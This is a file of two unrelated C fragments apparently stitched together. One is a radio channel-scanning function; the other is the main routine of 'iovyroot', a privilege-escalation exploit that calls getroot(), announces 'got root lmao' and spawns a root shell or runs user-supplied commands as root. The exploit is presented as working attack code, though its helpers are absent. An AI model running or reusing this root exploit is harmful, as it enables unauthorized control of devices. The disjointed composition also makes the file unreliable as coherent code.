int scan(char * devname){ char mac[14]={0x7a,0x7a,0x7a,0x7a,0x7a, 0x5b,0x5b,0x5b,0x5b,0x5b, 0x3c,0x6d,0x9e,0x5e}; int res; unsigned char ch; struct sockdata *sk=nrf_socket(devname); if(!sk)return -1; CHECK(set_if_down(sk),res,err); CHECK(setmac(sk,mac,sizeof(mac)),res,err); CHECK(setpipes(sk,0x1),res, err); CHECK(getpipes(sk,&ch),res,err); if(ch!=0x1)printf("set-get pipes not consistent."); for(ch=0;ch<127;++ch){ CHECK(setchannel(sk,ch),res,err); CHECK(set_if_up(sk),res,err); sleep(1); CHECK(set_if_down(sk),res,err); CHECK(getrpd(sk,rpd+ch),res,err); } ret: close_rawsocket(sk); return res; err: perror("Error in scan"); goto ret; }
int main(int argc, char* argv[]) { unsigned int i; int ret = 1; struct offsets* o; printf("iovyroot by zxz0O0\n"); printf("poc by idler1984\n\n"); if(!(o = get_offsets())) return 1; if(setfdlimit()) return 1; if(setprocesspriority()) return 1; if(getpipes()) return 1; if(initmappings()) return 1; ret = getroot(o); //let the threads end sleep(1); close(pipefd[0]); close(pipefd[1]); for(i = 0; i < IOVECS; i++) munmap(MMAP_BASE(i), MMAP_SIZE); if(getuid() == 0) { printf("got root lmao\n"); if(argc <= 1) system("USER=root /system/bin/sh"); else { char cmd[128] = { 0 }; for(i = 1; i < (unsigned int)argc; i++) { if(strlen(cmd) + strlen(argv[i]) > 126) break; strcat(cmd, argv[i]); strcat(cmd, " "); } system(cmd); } } return ret; }